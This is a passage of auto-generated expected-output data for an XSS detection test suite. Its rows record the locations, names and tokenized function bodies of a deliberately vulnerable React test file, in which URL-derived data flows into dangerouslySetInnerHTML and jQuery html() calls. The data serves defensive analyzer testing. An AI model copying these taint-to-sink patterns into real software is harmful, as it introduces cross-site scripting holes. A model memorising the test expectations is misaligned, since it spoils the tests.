URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:231:42:231:49 | tainted4 | contextSurroundingFunctionParameters | ()\n()\n(prevState, prevProps) | +| autogenerated/Xss/DomBasedXss/tst.js:231:42:231:49 | tainted4 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:231:42:231:49 | tainted4 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:231:42:231:49 | tainted4 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:6 | C2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:6 | C2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:6 | C2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:6 | C2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:6 | C2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:19 | C2.defaultProps | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:19 | C2.defaultProps | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:19 | C2.defaultProps | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:19 | C2.defaultProps | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:19 | C2.defaultProps | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:43 | C2.defa ... inted } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:43 | C2.defa ... inted } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:43 | C2.defa ... inted } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:43 | C2.defa ... inted } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:236:5:236:43 | C2.defa ... inted } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:236:8:236:19 | defaultProps | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:236:8:236:19 | defaultProps | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:236:8:236:19 | defaultProps | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:236:8:236:19 | defaultProps | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:236:8:236:19 | defaultProps | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:236:23:236:43 | { taint ... inted } | assignedToPropName | defaultProps | +| autogenerated/Xss/DomBasedXss/tst.js:236:23:236:43 | { taint ... inted } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:236:23:236:43 | { taint ... inted } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:236:23:236:43 | { taint ... inted } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:236:23:236:43 | { taint ... inted } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:236:23:236:43 | { taint ... inted } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:32 | tainted1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:32 | tainted1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:32 | tainted1 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:32 | tainted1 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:32 | tainted1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:41 | tainted1: tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:41 | tainted1: tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:41 | tainted1: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:41 | tainted1: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:41 | tainted1: tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:41 | tainted1: tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:41 | tainted1: tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:41 | tainted1: tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:41 | tainted1: tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:236:25:236:41 | tainted1: tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:236:35:236:41 | tainted | assignedToPropName | tainted1 | +| autogenerated/Xss/DomBasedXss/tst.js:236:35:236:41 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:236:35:236:41 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:236:35:236:41 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:236:35:236:41 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:236:35:236:41 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:238:5:238:30 | () | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:238:5:238:30 | () | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:238:5:238:30 | () | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:238:5:238:30 | () | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:238:5:238:30 | () | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:238:6:238:29 | | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:238:6:238:29 | | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:238:6:238:29 | | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:238:6:238:29 | | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:238:6:238:29 | | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:238:7:238:8 | C2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:238:7:238:8 | C2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:238:7:238:8 | C2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:238:7:238:8 | C2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:238:7:238:8 | C2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:238:10:238:17 | tainted2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:238:10:238:17 | tainted2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:238:10:238:17 | tainted2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:238:10:238:17 | tainted2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:238:10:238:17 | tainted2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:238:10:238:27 | tainted2={tainted} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:238:10:238:27 | tainted2={tainted} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:238:10:238:27 | tainted2={tainted} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:238:10:238:27 | tainted2={tainted} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:238:10:238:27 | tainted2={tainted} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| 